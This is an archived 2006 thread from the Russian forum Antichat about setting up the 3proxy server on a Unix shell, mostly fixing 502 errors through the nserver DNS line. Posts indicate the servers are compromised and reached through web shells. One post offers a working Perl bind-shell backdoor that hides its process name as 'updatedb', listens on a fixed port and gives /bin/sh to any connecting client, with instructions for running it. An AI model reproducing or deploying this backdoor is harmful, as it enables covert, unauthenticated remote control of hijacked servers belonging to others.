Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Soft - *nix (https://forum.antichat.xyz/forumdisplay.php?f=48)
-   -   3proxy (https://forum.antichat.xyz/showthread.php?t=17147)

Desr0w 06.04.2006 00:37
3proxy
 
Поставил 3proxy c конфигом следущего содержания:
nserver 127.0.0.1
proxy -p3128 -n
auth none
internal 127.0.0.1
log /dev/null
setgid 48
setuid 48

Чекаю на анонимность показывает -
Уровень безопасности: низкий.
Наличие прокси-сервера: не скрывает.

Такая тема не устаивает(Мож конфиг не правильный..

KEZ 06.04.2006 02:07
1) А ты чекай руками а не левыми чекерами
2) Зачем тебе proxy, если там есть сокс5 ?

Desr0w 06.04.2006 02:15
1)Чекер античатовский и на leader.ru :)
2)тогда так:
nserver 127.0.0.1
socks -p3128 -n
auth none
internal 127.0.0.1
log /dev/null
setgid 48
setuid 48

KEZ 06.04.2006 02:33
Естественно, сокс поднять нужно... Никогда не понимал смысла в использовании прокси, если нужно просто не светиться.

[bobs] 30.04.2006 04:45
хай пиплы
у меня следующий вопрос:

поднял на шелле 3proxy, вот конфиг:

Цитата:
nserver 127.0.0.1
auth none
allow *
proxy -p2121
socks -p2122
internal 127.0.0.1
log /dev/null
но коннект браузером к http-серверам через прокси (который на 2121 порту висит) не происходит - 502 Bad Gateway, но при этом асику клиент свободно коннектится к 80 порту login.icq.com через этот же прокси, т.е. фаер на серваке с проксей не блочит исходящие подключения на 80-й порт

в чем может быть причина? %)

Talisman 30.04.2006 07:05
2121 - блочит? а 80 - нет? просто значит в настройках фаера запрещают все, и разрешают 80.

[bobs] 30.04.2006 08:34
кароче еще раз тупо объясняю:

коннект через этот прокси icq-клиентом на 80 порт любого сервера мираблов осуществляется нормально
при коннекте любым браузером к любому хттп-серверу через эту же проксю не происходит по причине - 502 Bad Gateway

%)

Desr0w 01.05.2006 03:22
[bobs],епть-на вообще такая тема бывает когда с проксиков заходишь.
У тебя прям на всёх сайтах 502 Bad Gateway?

[bobs] 01.05.2006 04:17
да, на всех %)

+toxa+ 01.05.2006 12:13
Юзай такой конфиг

Код:
nserver 127.0.0.1
auth none
allow *
proxy -p3128 -a
internal 127.0.0.1
log /dev/null
притом если параметр будет "a", то прокс будет анонимным, если "a1", то он будет искажающим

Desr0w 24.05.2006 04:07
http://desr0w.jino-net.ru/3pr0xy.php
Если у кого будут праблы с три-проксей/

Zitt 24.05.2006 04:19
Кстате иногда надо еще и порт самому открывать
Вот скрипт на перле
Цитата:
#!/usr/bin/perl
$port = 34865;
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1){
accept(X, S);
unless(fork)
{ open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
} close X;}
Запускается как обычно (ето в фаил например bind.pl) perl bind.pl и в настройках прокси указываем порт который открыл!!!

Desr0w 24.05.2006 04:26
Zitt,не путай новичков;)
В данной статье всё делается через web-шелл и не надо открывать не каких портов.

Zitt 24.05.2006 04:30
Ну а я про што и в веб шелле мона набрать "perl bind.pl"

P.S.
Цитата:
З.ы-podkashey ты истеричка 12-и летняя.

Заканчивал бы ты с етим! Сколько можно!
Вроде разобрались

dim_ok 24.05.2006 18:11
Цитата:
Сообщение от +toxa+
Юзай такой конфиг

Код:
nserver 127.0.0.1
auth none
allow *
proxy -p3128 -a
internal 127.0.0.1
log /dev/null
вот тут то как раз и ошибка, когда всегда вылетает 502-ой, неправильно указан nserver тут или узнать его адрес ну скажем командой nslookup blablalba.com будет типа
Код:
Server:        10.10.10.10
Address:        10.10.10.10#53
это и есть адрес name server'a он же dns =) или вообще убрать эту строку, тогда он будет определяться с помощью системных функций, как сказано в документации к 3proxy.

AoD 24.05.2006 21:27
2 dim_ok

нет не удаляй строка "nserver 127.0.0.1" нужна обязательно. Прикол в том что когда указываешь адрес "127.0.0.1" то поидее это автоматическое определение, но у меня на многих серваках эта хня не работала. Тебе нужно вместо "127.0.0.1" вписать адрес какогонибудь сервака DNS который находится в инете (любого) и заработает

Zitt 24.05.2006 23:18
Цитата:
Тебе нужно вместо "127.0.0.1" вписать адрес какогонибудь сервака DNS который находится в инете (любого) и заработает
Чёта вериться с трудом хотя хз... всё может быт)))
А вобще надо выполнить "/sbin/ifconfig" там будет много всякой инфы и среди неё и ip

AoD 25.05.2006 10:52
Цитата:
Сообщение от Zitt
Чёта вериться с трудом хотя хз... всё может быт)))
А вобще надо выполнить "/sbin/ifconfig" там будет много всякой инфы и среди неё и ip
А почему верится с трудом ведь ошибка 502 Bad Gateway в данном конкретном случае как раз и означает неправильный ответ сервера. То есть он не может найти DNS имя запрашиваемого ресурса, потому что строка nserver 127.0.0.1 означает, что DNS сервер находится на локалхосте. Есть ли он там на самом деле проверить очень просто просканить этот сервак на 53 порт на котором и весить DNS сервер. А у [bobs] походу на этом серваке нет DNS сервера поэтому ему необходимо указать любой другой. Всё просто. А командой ifconfig –a ты узнаешь IP самого сервака + возможно броадкаст но никак не то что есть ли DNS сервер на этой машине. А IP машины вписывается не в nserver 127.0.0.1 а в internal 127.0.0.1 тодиш на какой интерфейс приходят входящие пакеты.

Zitt 25.05.2006 23:34
Цитата:
А командой ifconfig –a ты узнаешь IP самого сервака + возможно броадкаст но никак не то что есть ли DNS сервер на этой машине. А IP машины вписывается не в nserver 127.0.0.1 а в internal 127.0.0.1 тодиш на какой интерфейс приходят входящие пакеты.
И в правду щас попробовал там тока ip самой машины ну признаю был не прав!!!

AoD 27.06.2006 15:27
Кстати чтобы узнать с какими DNS серверами работает взломанный сервак нужно просто просмотреть файл resolv.conf ну допустим через редактор cat:

cat /etc/resolv.conf

и заменить IP адрес 127.0.0.1 в строке nserver 127.0.0.1 на IP из файла resolv.conf


Время: 12:31